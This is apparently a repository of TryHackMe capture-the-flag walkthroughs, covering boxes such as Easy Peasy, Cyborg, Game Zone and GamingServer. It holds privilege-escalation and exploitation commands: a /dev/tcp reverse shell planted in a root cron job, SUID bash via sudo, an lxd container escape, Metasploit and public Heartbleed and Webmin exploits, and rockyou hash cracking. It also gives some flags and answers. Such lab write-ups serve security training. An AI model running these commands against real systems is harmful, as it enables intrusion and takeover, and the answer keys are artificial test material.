40 | tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
41 | ~~~
42 | - On your machine `ssh-keygen`
43 | - `cd ~/.ssh`
44 | - `python3 -m http.server`
45 | - On target `curl :8000/id_rsa.pub > ~/.ssh/authorized_keys`
46 | - `chmod 600 id_rsa`
47 | - `ssh -L 9001:127.0.0.1:9001 -i id_rsa apaar@`
48 | - `cat /var/www/files/index.php`
49 | - Found username and password for MySQL database.
50 | - `mysql -u root -p` and enter the password found.
51 | - `show databases;`
52 | - `use webportal;`
53 | - `show tables;`
54 | - `select * from users;`
55 | - Save those two hashes
56 | - `john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt`
57 | - Log in to the website at localhost:9001
58 | - Download the image and execute `steghide extract -sf hacker-with-laptop_23-2147985341.jpg`
59 | - `fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip`
60 | - Inspect `source_code.php`
61 | - `echo ******************** | base64 -d`
62 | - `su anurodh` and enter password
63 | - `docker images`
64 | - `docker run -v /root:/mnt -it alpine`
65 | - `cat /mnt/proof.txt`
66 | - `{ROOT-FLAG: ********************************}`
67 |
68 |
69 |
70 |
71 |
72 |
--------------------------------------------------------------------------------
/Cyborg/README.md:
--------------------------------------------------------------------------------
1 | # Cyborg
2 |
3 | - Deploy the machine
4 |
5 | no answer needed
6 |
7 | - Scan the machine, how many ports are open?
8 |
9 | - `scilla port -target `
10 | - `*`
11 |
12 | - What service is running on port 22?
13 |
14 | - `ssh`
15 |
16 | - What service is running on port 80?
17 |
18 | - `http`
19 |
20 | - What is the user.txt flag?
21 |
22 | - Go to `/etc`
23 | - And you find `http:///etc/squid/passwd`
24 | - So you have found something like `username:password`.
25 | - `hash-identifier` and paste the password.
26 | - `echo password > hash`
27 | - `hashcat --force -m 1600 -a 0 hash /home/kali/rockyou.txt`
28 | - `ssh username@` and enter the password.
29 | - It seems to be a password file...
30 | - `scilla dir -target `
31 | - `/admin/` found!
32 | - Go to admin page and download the archive.tar file.
33 | - `tar -xvf archive.tar`
34 | - This is a [Borg](https://borgbackup.readthedocs.io/en/stable/) thing.
35 | - Install borg.
36 | - `borg extract archive.tar::music_archive`
37 | - You found the ssh credentials.
38 | - `ssh ****@` and enter the password.
39 | - `cat user.txt`
40 | - `flag{************************************}`
41 |
42 | - What is the root.txt flag?
43 |
44 | - `sudo -l`
45 | - `cat /etc/mp3backups/backup.sh`
46 | - `sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"`
47 | - `bash -p`
48 | - `cat /root/root.txt`
49 | - `flag{***********************************}`
50 |
--------------------------------------------------------------------------------
/Easy-Peasy/README.md:
--------------------------------------------------------------------------------
1 | # Easy Peasy
2 |
3 | - How many ports are open?
4 |
5 | - `nmap `
6 | - `3`
7 |
8 | - What is the version of nginx?
9 |
10 | - `nmap -sV `
11 | - `1.16.1`
12 |
13 | - What is running on the highest port?
14 |
15 | - `apache`
16 |
17 | - Using GoBuster, find flag 1.
18 |
19 | - `gobuster dir -u http:/// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
20 | - We find `/hidden`.
21 | - Go in depth. `gobuster dir -u http:///hidden/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
22 | - We find `/whatever`
23 | - Inspect page source.
24 | - `ZmxhZ3tmMXJzN19mbDRnfQ==`
25 | - `echo -n ZmxhZ3tmMXJzN19mbDRnfQ== | base64 -d`
26 | - `flag{f1rs7_fl4g}`
27 |
28 | - Further enumerate the machine, what is flag 2?
29 |
30 | - Remember, there is another publicly exposed server. Go to `http://:65524`.
31 | - With the same gobuster command as before, we can see there is a robots.txt file.
32 | - `a18672860d0510e5ab6699730763b250`
33 | - `hash-identifier`
34 | - Just search on google
35 | - `flag{1m_s3c0nd_fl4g}`
36 |
37 | - Crack the hash with easypeasy.txt, What is the flag 3?
38 |
39 | - Inspect source code of default Apache page.
40 | - `flag{9fdafbd64c47471a8f54cd3fc64cd312}`
41 |
42 | - What is the hidden directory?
43 |
44 | - Looking at the second server (apache) index page source code I found `its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu`.
45 | - Play a bit with CyberChef.
46 | - `/n0th1ng3ls3m4tt3r` (base62).
47 |
48 | - Using the wordlist that was provided to you in this task, crack the hash.
49 | What is the password?
50 |
51 | - Go to this directory with a browser and inspect source code.
52 | - `940d71e8655*********8ab85066**********418**********83e7f5fe6*d81`
53 | - `hash-identifier`
54 | - `john --wordlist=easypeasy.txt --format=gost hash.txt`
55 | - `mypass*************`
56 |
57 | - What is the password to login to the machine via SSH?
58 |
59 | - Download the central image on the page (`http://:65524/n0th1ng3ls3m4tt3r`)
60 | - `steghide extract -sf binarycodepixabay.jpg` and enter the password.
61 | - In the new file you will have a username and a binary password.
62 | - Just convert the binary code to text.
63 | - `***********************binary`
64 |
65 | - What is the user flag?
66 |
67 | - Log in via ssh (not on port 22; remember the output of nmap).
68 | - `cat user.txt`
69 | - This isn't the real flag. Just use ROT13.
70 | - `flag{n0wi************}`
71 |
72 | - What is the root flag?
73 |
74 | - Try searching for something related to cron jobs.
75 | - `cat /etc/crontab`
76 | - uuuuuuuuh `/var/www/.mysecretcronjob.sh`
77 | - This code will be executed as root, so:
78 | - Insert this on that file: `/bin/bash -i >& /dev/tcp//4444 0>&1`
79 | - On your machine `nc -lnvp 4444`
80 | - `cat /root/flag.txt` ......
81 | - wat?
82 | - oH. Ok. `cat /root/.root.txt`
83 | - `flag{63a**0e******05079**********1845}`
84 |
85 |
86 |
87 |
88 |
89 |
--------------------------------------------------------------------------------
/Easy-Peasy/binarycodepixabay.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Easy-Peasy/binarycodepixabay.jpg
--------------------------------------------------------------------------------
/Easy-Peasy/hash.txt:
--------------------------------------------------------------------------------
1 | 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81
--------------------------------------------------------------------------------
/Easy-Peasy/secrettext.txt:
--------------------------------------------------------------------------------
1 | username:boring
2 | password:
3 | 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
4 |
--------------------------------------------------------------------------------
/Encryption-Crypto-101/README.md:
--------------------------------------------------------------------------------
1 | # Encryption - Crypto 101
2 |
3 | - I'm ready to learn about encryption
4 |
5 | no answer needed
6 |
7 | - I agree not to complain too much about how theory heavy this room is.
8 |
9 | no answer needed
10 |
11 | - Are SSH keys protected with a passphrase or a password?
12 |
13 | - `passphrase`
14 |
15 | - What does SSH stand for?
16 |
17 | - `secure shell`
18 |
19 | - How do webservers prove their identity?
20 |
21 | - `certificate`
22 |
23 | - What is the main set of standards you need to comply with if you store or process payment card details?
24 |
25 | - `PCI-DSS`
26 |
27 | - What's 30 % 5?
28 |
29 | - `0`
30 |
31 | - What's 25 % 7
32 |
33 | - `4`
34 |
35 | - What's 118613842 % 9091
36 |
37 | - `python3`
38 | - `118613842 % 9091`
39 | - `****`
40 |
41 | - Should you trust DES? Yea/Nay
42 |
43 | - `Nay`
44 |
45 | - What was the result of the attempt to make DES more secure so that it could be used for longer?
46 |
47 | - Google it!
48 |
49 | - Is it ok to share your public key? Yea/Nay
50 |
51 | - `Yea`
52 |
53 | - p = 4391, q = 6659. What is n?
54 |
55 | - `python3`
56 | - `4391 * 6659`
57 | - `********`
58 |
59 | - I understand enough about RSA to move on, and I know where to look to learn more if I want to.
60 |
61 | no answer needed
62 |
63 | - I understand how keys can be established using Public Key (asymmetric) cryptography.
64 |
65 | no answer needed
66 |
67 | - What company is TryHackMe's certificate issued to?
68 |
69 | - In your browser, click on the lock icon next to the tryhackme URL.
70 | - Look at the certificate.
71 | - `**********`
72 |
73 | - I recommend giving this a go yourself. Deploy a VM, like Learn Linux and try to add an SSH key and log in with the private key.
74 |
75 | no answer needed
76 |
77 | - Download the SSH Private Key attached to this room.
78 |
79 | no answer needed
80 |
81 | - What algorithm does the key use?
82 |
83 | - `rsa`
84 |
85 | - Crack the password with John The Ripper and rockyou, what's the passphrase for the key?
86 |
87 | - `python2 /usr/share/john/ssh2john.py idrsa.id_rsa > id_rsa.hash`
88 | - `john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash`
89 | - `*********`
90 |
91 | - I understand how Diffie Hellman Key Exchange works at a basic level
92 |
93 | no answer needed
94 |
95 | - Time to try some GPG. Download the archive attached and extract it somewhere sensible.
96 |
97 | no answer needed
98 |
99 | - You have the private key, and a file encrypted with the public key. Decrypt the file. What's the secret word?
100 |
101 | - `gpg --import tryhackme.key`
102 | - `gpg -d message.gpg`
103 | - `*********`
104 |
105 | - I understand that quantum computers affect the future of encryption. I know where to look if I want to learn more.
106 |
107 | no answer needed
108 |
109 |
110 |
111 |
112 |
113 |
--------------------------------------------------------------------------------
/Erit-Securus-I/README.md:
--------------------------------------------------------------------------------
1 | # Erit Securus I
2 |
3 | - Deploy box
4 |
5 | no answer needed
6 |
7 | - How many ports are open?
8 |
9 | - `scilla port -target `
10 | - `2`
11 |
12 | - What ports are open? Comma separated, lowest first: `**,**`
13 |
14 | - `**,**`
15 |
16 | - What CMS is the website built on?
17 |
18 | - `bolt`
19 |
20 | - In the exploit from 2020-04-05, what language is used to write the exploit?
21 |
22 | - `python`
23 |
24 | - As the exploit is authenticated, you will also need a username and password. Knowing the URI for the login-portal is also critical for the exploit to work. Find the login-portal and try logging in.
25 |
26 | no answer needed
27 |
28 | - What is the username of the user running the web server?
29 |
30 | - `www-data`
31 |
32 | - What is the user's password?
33 |
34 | - `sqlite3 bolt.db`
35 | - `.tables`
36 | - `select * from bolt_users;`
37 | - `echo '$2y$*****************************************************' > hash`
38 | - `*********`
39 |
40 | - Flag 1
41 |
42 | - `su wileec`
43 | - `cat flag1.txt`
44 | - `********************`
45 |
46 | - User wileec can sudo! What can he sudo?
47 |
48 | - `(*******) NOPASSWD: /usr/bin/***`
49 |
50 | - Flag 2
51 |
52 | - `$ TF=$(mktemp -u)`
53 | - `sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'`
54 | - `sudo rm $TF`
55 | - `SHELL=/bin/bash script -q /dev/null`
56 | - `ls`
57 | - `cat flag2.txt`
58 | - `********************************`
59 |
60 | - What sudo rights does jsmith have?
61 |
62 | - `(ALL : ALL) NOPASSWD: ALL`
63 |
64 | - Flag 3
65 |
66 | - `sudo -s`
67 | - `cd /root/`
68 | - `ls`
69 | - `cat flag3.txt`
70 | - `****************************************`
71 |
--------------------------------------------------------------------------------
/Game-Zone/README.md:
--------------------------------------------------------------------------------
1 | # Game Zone
2 |
3 | - Deploy the machine and access its web server.
4 |
5 | no answer needed
6 |
7 | - What is the name of the large cartoon avatar holding a sniper on the forum?
8 |
9 | - `Agent 47`
10 |
11 | - Here is a potential place of vulnerability, as you can input your username as another SQL query. This will take the query write, place and execute it.
12 |
13 | no answer needed
14 |
15 | - The extra SQL we inputted as our password has changed the above query to break the initial query and proceed (with the admin user) if 1==1, then comment the rest of the query to stop it breaking.
16 |
17 | no answer needed
18 |
19 | - When you've logged in, what page do you get redirected to?
20 |
21 | - `portal.php`
22 |
23 | - In the users table, what is the hashed password?
24 |
25 | - `ab5db915fc9cea6c78df88106c6500c57f2b***************************`
26 |
27 | - What was the username associated with the hashed password?
28 |
29 | - `agent47`
30 |
31 | - What was the other table name?
32 |
33 | - `post`
34 |
35 | - Once you have JohnTheRipper installed you can run it against your hash.
36 |
37 | no answer needed
38 |
39 | - What is the de-hashed password?
40 |
41 | - `video*******`
42 |
43 | - What is the user flag?
44 |
45 | - `ssh agent47@`, `yes` and enter the password.
46 | - `pwd`
47 | - `ls`
48 | - `cat user.txt`
49 | - `***********************`
50 |
51 | - How many TCP sockets are running?
52 |
53 | - `5`
54 |
55 | - What is the name of the exposed CMS?
56 |
57 | - `webmin`
58 |
59 | - What is the CMS version?
60 |
61 | - `1.580`
62 |
63 | - What is the root flag?
64 |
65 | - `msfconsole`
66 | - `search webmin 1.580`
67 | - `use 1`
68 | - `set payload cmd/unix/reverse`
69 | - `set PASSWORD ************`
70 | - `set USERNAME agent47`
71 | - `set LHOST `
72 | - `SET RHOSTS 127.0.0.1`
73 | - `SET RPORT 10000`
74 | - `run`
75 | - `pwd`
76 | - `cat /root/root.txt`
77 | - `*************************`
78 |
79 |
80 |
81 |
82 |
--------------------------------------------------------------------------------
/GamingServer/README.md:
--------------------------------------------------------------------------------
1 | # GamingServer
2 |
3 | - What is the user flag?
4 |
5 | - Visit `http://`.
6 | - `scilla port -target -p -1000`
7 | - Two ports open. 22 and 80.
8 | - `scilla dir -target `
9 | ~~~
10 | [+]FOUND: http:///uploads/ 200 OK
11 | [+]FOUND: http:///secret/ 200 OK
12 | ~~~
13 | - Found a dictionary of passwords in uploads (dict.lst) and an RSA private key.
14 | - Save these two files.
15 | - `python2 /usr/share/john/ssh2john.py rsa_priv > id_rsa.hash`
16 | - `john -w dict.lst id_rsa.hash`
17 | - `chmod 600 rsa_priv`
18 | - `ssh john@ -i rsa_priv`. We know the user is john from the website.
19 | - `ls`
20 | - `cat user.txt`
21 | - `*********************************`
22 |
23 | - What is the root flag?
24 |
25 | - john is in the `lxd` group.
26 | - So download the [lxd Alpine Builder](https://github.com/saghul/lxd-alpine-builder).
27 | - `git clone https://github.com/saghul/lxd-alpine-builder.git`
28 | - `cd lxd-alpine-builder`
29 | - `sudo ./build-alpine`
30 | - `python3 -m http.server`
31 | - On target `wget http://:8000/alpine-*****************.tar.gz`
32 | - `lxc image import ./alpine-*****************.tar.gz --alias myimage`
33 | - `lxc init myimage ignite -c security.privileged=true`
34 | - `lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true`
35 | - `lxc start ignite`
36 | - `lxc exec ignite /bin/sh`
37 | - `id`
38 | - `cat /mnt/root/root/root.txt `
39 | - `********************************`
40 |
41 |
42 |
43 |
44 |
45 |
--------------------------------------------------------------------------------
/Geolocating-Images/README.md:
--------------------------------------------------------------------------------
1 | # Geolocating Images
2 |
3 | - Download the zip file
4 |
5 | no answer needed
6 |
7 | - Where in the world is image 1? The answer is the country name.
8 |
9 | - Use [yandex](https://yandex.com/images/search)
10 | - `china`
11 |
12 | - no title
13 |
14 | no answer needed
15 |
16 | - Where was image 2 taken?
17 |
18 | - Search on Google `W Shieffield av. Addison av.`
19 | - You should get a result on a Chicago street.
20 | - Switch to street view.
21 | - `*******************`
22 |
23 | - Read the above material
24 |
25 | no answer needed
26 |
27 | - Where was image 3 taken?
28 |
29 | - Tried Google dorks, maps, shodan, other engines, exiftool: nothing.
30 | - Then I tried with some information, such as Paris cemetery, and so on.
31 | - Finally I searched for Paris Observatory.
32 | - `Meudon Observatory`
33 |
34 | - Where is image 4 taken?
35 |
36 | - `Abbey road` :P
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/Geolocating-Images/thm/1.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Geolocating-Images/thm/1.jpeg
--------------------------------------------------------------------------------
/Geolocating-Images/thm/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Geolocating-Images/thm/2.png
--------------------------------------------------------------------------------
/Geolocating-Images/thm/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Geolocating-Images/thm/3.png
--------------------------------------------------------------------------------
/Geolocating-Images/thm/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Geolocating-Images/thm/4.png
--------------------------------------------------------------------------------
/Getting-Started/README.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | - What is the name of the hidden admin page?
4 |
5 | - Inspect page source code
6 | - `/test-admin`
7 |
8 | - What is the username and password in the form username:password?
9 |
10 | - `admin:admin`
11 |
12 | - How many users are signed up to the application?
13 |
14 | - `3`
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/GoldenEye/goldeneye.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/GoldenEye/goldeneye.jpg
--------------------------------------------------------------------------------
/Gotta-Catch'em-All/README.md:
--------------------------------------------------------------------------------
1 | # Gotta Catch'em All!
2 |
3 | - Find the Grass-Type Pokemon
4 |
5 | - `nmap -sV `
6 | - `:` in the source code of the default page...
7 | - `ssh pokemon@` and enter the password
8 | - `cd Desktop`
9 | - `nc -lnvp 1234 < P0kEmOn.zip`
10 | - `nc 1234 > pokemon.zip`
11 | - `unzip pokemon.zip`
12 | - `cd P0kEmOn`
13 | - `cat grass-type.txt`
14 | - `50 6f 4b ** 4d 6f ** ** ** 75 ** 62 ** 73 61 75 ** 7d`
15 | - CyberChef with recipe "From Hex".
16 | - `*******{*********}`
17 |
18 | - Find the Water-Type Pokemon
19 |
20 | - `find / -type f | grep water-type`
21 | - `cat /var/www/html/water-type.txt`
22 | - `**************{********}`
23 | - But this flag makes no sense...
24 | - Caesar cipher? Yes...
25 | - `**************{********}`
26 |
27 | - Find the Fire-Type Pokemon
28 |
29 | - `find / -type f | grep fire-type`
30 | - `cat /etc/why_am_i_here?/fire-type.txt`
31 | - `cat /etc/why_am_i_here?/fire-type.txt | base64 -d`
32 | - `*******{**********}`
33 |
34 | - Who is Root's Favorite Pokemon?
35 |
36 | - `find / -type f | grep root`
37 | - After a lot of lines... `/home/roots-pokemon.txt`
38 | - `cat /home/roots-pokemon.txt`. Permission denied. f+ck.
39 | - After some minutes..
40 | - `pokemon@root:~/Videos/Gotta/Catch/Them/ALL!$ cat Could_this_be_what_Im_looking_for\?.cplusplus`
41 | - `sudo su ash` and enter the password.
42 | - `sudo -l`
43 | - `cat /home/roots-pokemon.txt`
44 | - `********`
45 |
46 | - Congratulations! Thank You So Much For Completing The Pokemon Room!
47 |
48 | no answer needed
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/Hardening-Basics-Part-2/README.md:
--------------------------------------------------------------------------------
1 | # Hardening Basics Part 2
2 |
3 | - Deploy the VM if necessary and let's go!
4 |
5 | no answer needed
6 |
7 | - Which SSH Protocol version is the most secure?
8 |
9 | - `2`
10 |
11 | - This is a random, arbitrary number, used as the session key, that is used to encrypt GPG.
12 |
13 | - `nonce`
14 |
15 | - Yey/Ney - GPG is based off of the OpenGPG standard
16 |
17 | - `yey`
18 |
19 | - What is the command to generate your GPG keys?
20 |
21 | - `gpg --gen-key`
22 |
23 | - What is the command to symmetrically encrypt a file with GPG?
24 |
25 | - `gpg -c`
26 |
27 | - What is the command to asymmetrically encrypt a file with GPG?
28 |
29 | - `gpg -e`
30 |
31 | - What is the command to create SSH keys?
32 |
33 | - `ssh-keygen`
34 |
35 | - Where are ssh keys stored in a user's home directory?
36 |
37 | - `.ssh`
38 |
39 | - What option needs to be set to select the type of key to generate for SSH?
40 |
41 | - `-t`
42 |
43 | - The SSH configuration options presented in this chapter were found in what file (full path)?
44 |
45 | - `/etc/ssh/sshd_config`
46 |
47 | - No questions
48 |
49 | no answer needed
50 |
51 | - No questions
52 |
53 | no answer needed
54 |
55 | - No questions
56 |
57 | no answer needed
58 |
59 | - No questions
60 |
61 | no answer needed
62 |
63 | - No questions
64 |
65 | no answer needed
66 |
67 | - No questions
68 |
69 | no answer needed
70 |
71 | - No questions
72 |
73 | no answer needed
74 |
75 | - No questions
76 |
77 | no answer needed
78 |
79 | - No questions
80 |
81 | no answer needed
82 |
83 | - No questions
84 |
85 | no answer needed
86 |
87 | - Where are the AppArmor profiles located?
88 |
89 | - `/etc/apparmor.d`
90 |
91 | - This directory includes partial profiles to be used in your own custom profiles
92 |
93 | - `abstractions`
94 |
95 | - This punctuation mark is REQUIRED at the end of every rule in a profile
96 |
97 | - `,`
98 |
99 | - This AppArmor mode enforces the profiles but also logs them
100 |
101 | - `audit`
102 |
103 | - This command checks the status of AppArmor
104 |
105 | - `aa-status`
106 |
107 | - No questions
108 |
109 | no answer needed
110 |
111 | - Have fun!
112 |
113 | no answer needed
114 |
--------------------------------------------------------------------------------
/Hashing-Crypto_101/README.md:
--------------------------------------------------------------------------------
1 | # Hashing - Crypto 101
2 |
3 | - Is base64 encryption or encoding?
4 |
5 | - `encoding`
6 |
7 | - What is the output size in bytes of the MD5 hash function?
8 |
9 | - `16`
10 |
11 | - Can you avoid hash collisions? (Yea/Nay)
12 |
13 | - `Nay`
14 |
15 | - If you have an 8 bit hash output, how many possible hashes are there?
16 |
17 | - `256`
18 |
19 | - Crack the hash "d0199f51d2728db6011945145a1b607a" using the rainbow table manually.
20 |
21 | - `basketball`
22 |
23 | - Crack the hash "5b31f93c09ad1d065c0491b764d04933" using online tools
24 |
25 | - Just google it
26 |
27 | - Should you encrypt passwords? Yea/Nay
28 |
29 | - `Nay`
30 |
31 | - How many rounds does sha512crypt ($6$) use by default?
32 |
33 | - `5000`
34 |
35 | - What's the hashcat example hash (from the website) for Citrix Netscaler hashes?
36 |
37 | - [here](https://hashcat.net/wiki/doku.php?id=example_hashes)
38 |
39 | - How long is a Windows NTLM hash, in characters?
40 |
41 | - `32`
42 |
43 | - Crack this hash: $2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG
44 |
45 | - Copy this hash inside a file called `hash`
46 | - `hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt`
47 | - `***********`
48 |
49 | - Crack this hash: 9eb7ee7f551d2f0ac684981bd1f1e2fa4a37590199636753efe614d4db30e8e1
50 |
51 | - `hash-identifier` and paste the hash
52 | - `echo "9eb7ee7f551d2f0ac684981bd1f1e2fa4a37590199636753efe614d4db30e8e1" > hash`
53 | - `john --format=raw-sha256 hash -w /usr/share/wordlists/rockyou.txt`
54 | - `************`
55 |
56 | - Crack this hash: $6$GQXVvW4EuM$ehD6jWiMsfNorxy5SINsgdlxmAEl3.yif0/c3NqzGLa0P.S7KRDYjycw5bnYkF5ZtB8wQy8KnskuWQS3Yr1wQ0
57 |
58 | - Just google it
59 | - `********`
60 |
61 | - Bored of this yet? Crack this hash: b6b0d451bbf6fed658659a9e7e5598fe
62 |
63 | - Just google it
64 | - `*********`
65 |
66 | - What's the SHA1 sum for the amd64 Kali 2019.4 ISO? http://old.kali.org/kali-images/kali-2019.4/
67 |
68 | - http://old.kali.org/kali-images/kali-2019.4/SHA1SUMS
69 | - `**************************`
70 |
71 | - What's the hashcat mode number for HMAC-SHA512 (key = $pass)?
72 |
73 | - `hashcat --help | grep HMAC-SHA512`
74 | - `****`
75 |
76 |
77 |
--------------------------------------------------------------------------------
/HeartBleed/README.md:
--------------------------------------------------------------------------------
1 | # HeartBleed
2 |
3 | - Read above and ensure you have a good understanding of how the Heartbleed vulnerability works.
4 |
5 | no answer needed
6 |
7 | - What is the flag?
8 |
9 | - `searchsploit heartbleed`
10 | - `searchsploit -m 32745`
11 | - `python 32745.py > result.txt`
12 | - `cat result.txt`
13 | - `THM{**************}`
14 |
15 |
16 |
--------------------------------------------------------------------------------
/IMAGES/THMlogo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/IMAGES/THMlogo.png
--------------------------------------------------------------------------------
/Intro-PoC-Scripting/README.md:
--------------------------------------------------------------------------------
1 | # Intro PoC Scripting
2 |
3 | - Please read the introduction description
4 |
5 | no answer needed
6 |
7 | - What is the target's platform and version number?
8 |
9 | - `webmin 1.580`
10 |
11 | - What is the associated CVE for this platform?
12 |
13 | - `CVE-2012-2982`
14 |
15 | - Which file does the vulnerability exist in?
16 |
17 | - `file/show.cgi`
18 |
19 | - What program/command would be the most effective to use in this exploit?
20 |
21 | - `system shell`
22 |
23 | - What's the original disclosure date of this exploit?
24 |
25 | - `September 6 2012`, It's written in the POC.
26 |
27 |
28 | - What HTTP response code do we expect after the initial POST request?
29 |
30 | - `302`
31 |
32 | - What does sid stand for and what is its purpose?
33 |
34 | - `Session ID, authentication`
35 |
36 | - In the check function, what is it doing to the cookies?
37 |
38 | - `format`
39 |
40 | - In the second request of the check function, what method is piped into the command?
41 |
42 | - `rand_text_alphanumeric`
43 |
44 | - Which HTTP response header allows us to send an authenticated POST request?
45 |
46 | - `Set-Cookie`
47 |
48 | - Which is the correct method for formatting cookies in this example?
49 |
50 | - `any`
51 |
52 | - What data type does the payload need to be?
53 |
54 | - `string`
55 |
56 | - Why do we need to use "bash -c exec" instead of just "bash -i"
57 |
58 | - `replaces current shell process`
59 |
60 | - What is the purpose of "<&1" in the payload function?
61 |
62 | - `redirects socket output stream to bash input stream`
63 |
64 | - Run the program and listen for the shell. What is the /root/root.txt flag?
65 |
66 | - `wget https://raw.githubusercontent.com/cd6629/CVE-2012-2982-Python-PoC/master/web.py`
67 | - Change the IP address inside the file with yours.
68 | - Listen for a shell with `sudo nc -lnvp 53`
69 | - `python3 web.py `
70 | - On the new shell `cat /root/root.txt`
71 | - `THM{****************}`
72 |
73 | - No questions here
74 |
75 | no answer needed
76 |
77 | - Check out some of those links for more reading material.
78 |
79 | no answer needed
80 |
81 |
82 |
83 |
--------------------------------------------------------------------------------
/Intro-to-Python/README.md:
--------------------------------------------------------------------------------
1 | # Intro to Python
2 |
3 | - Section Complete
4 |
5 | no answer needed
6 |
7 | - Section Complete
8 |
9 | no answer needed
10 |
11 | - What is the name of >
12 |
13 | - `greater than`
14 |
15 | - What is the name of !=
16 |
17 | - `not equal to`
18 |
19 | - 1 != 0 will this return true or false (T or F)
20 |
21 | - `T`
22 |
23 | - What is the name of <=
24 |
25 | - `less or equal than`
26 |
27 | - Will this sample code return truee or false
28 |
29 | - `truee`
30 |
31 | - Section Complete
32 |
33 | no answer needed
34 |
35 | - Section Complete
36 |
37 | no answer needed
38 |
39 | - What data type is 13
40 |
41 | - `integer`
42 |
43 | - What data type is "65"
44 |
45 | - `string`
46 |
47 | - What data type is 62.193
48 |
49 | - `float`
50 |
51 | - Section Complete
52 |
53 | no answer needed
54 |
55 | - Section Complete
56 |
57 | no answer needed
58 |
59 | - Section Complete
60 |
61 | no answer needed
62 |
63 | - Section Complete
64 |
65 | no answer needed
66 |
67 | - Section Complete
68 |
69 | no answer needed
70 |
71 | - Section Complete
72 |
73 | no answer needed
74 |
75 | - Section Complete!
76 |
77 | no answer needed
78 |
79 | - Enter the decoded flag to complete the room!
80 |
81 | - `python decode.py`
82 | - `*********************************`
83 |
84 |
85 |
--------------------------------------------------------------------------------
/Intro-to-Python/decode.py:
--------------------------------------------------------------------------------
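import base64


def decode_flag(encoded, rounds: int = 5) -> bytes:
    """Strip the room's layered encoding from a flag.

    The flag in ``encodedflag.txt`` was wrapped ``rounds`` times in base64,
    then ``rounds`` times in base32, then ``rounds`` times in base16.  Decoding
    therefore peels the layers off in the opposite order: base16 first,
    base32 second, base64 last.

    Args:
        encoded: The encoded text, as ``str`` or ``bytes``.  Surrounding
            whitespace (typically the trailing newline left by a text editor)
            is dropped first, because base16 and base32 reject characters
            outside their alphabets.
        rounds: Number of layers applied per codec; the room uses 5.

    Returns:
        The fully decoded flag as raw bytes.

    Raises:
        binascii.Error: if a layer is not valid input for its codec.
        ValueError: if a ``str`` input contains non-ASCII characters.
    """
    if isinstance(encoded, str):
        encoded = encoded.encode("ascii")
    data = encoded.strip()
    # Each decoder yields bytes that are the input to the next layer, so the
    # same variable is threaded through all three codecs in turn.
    for decoder in (base64.b16decode, base64.b32decode, base64.b64decode):
        for _ in range(rounds):
            data = decoder(data)
    return data


if __name__ == "__main__":
    # Read as text; decode_flag() tolerates the trailing newline.
    with open("encodedflag.txt", "r") as f:
        encoded_flag = f.read()
    print(decode_flag(encoded_flag))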
--------------------------------------------------------------------------------
/Intro-to-Windows/README.md:
--------------------------------------------------------------------------------
1 | # Intro to Windows
2 |
3 | - Read a little about Windows history and versions.
4 |
5 | no answer needed
6 |
7 | - When was Windows announced?
8 |
9 | - `November 20 1985`
10 |
11 | - Which is the latest version of Windows?
12 |
13 | - `Windows 10`
14 |
15 | - Which is the latest version of Windows Server?
16 |
17 | - `Windows Server 2019`
18 |
19 | - Read the above.
20 |
21 | no answer needed
22 |
23 | - In which folder are users profiles stored?
24 |
25 | - `Users`
26 |
27 | - Read the above.
28 |
29 | no answer needed
30 |
31 | - Which Active Directory is cloud based?
32 |
33 | - `Azure Active Directory`
34 |
35 | - Which authentication method does not provide data integrity?
36 |
37 | - `NTLM`
38 |
39 | - Authentication method that assigns a ticket in order for a user to login?
40 |
41 | - `Kerberos`
42 |
43 | - Which authentication method allows users to access applications with a single login (short name)?
44 |
45 | - `SAML`
46 |
47 | - Authentication method that uses JSON Web Tokens?
48 |
49 | - `OpenID Connect`
50 |
51 | - Read the above.
52 |
53 | no answer needed
54 |
55 | - Read the above.
56 |
57 | no answer needed
58 |
59 | - Which can be considered the most important server?
60 |
61 | - `Domain Controller`
62 |
63 | - Which server can store emails?
64 |
65 | - `Mail Server`
66 |
67 | - Create the users and groups.
68 |
69 | no answer needed
70 |
71 | - Create your first GPO.
72 |
73 | no answer needed
74 |
75 |
76 |
--------------------------------------------------------------------------------
/Introduction-to-Django/README.md:
--------------------------------------------------------------------------------
1 | # Introduction to Django
2 |
3 | - Read the above.
4 |
5 | no answer needed
6 |
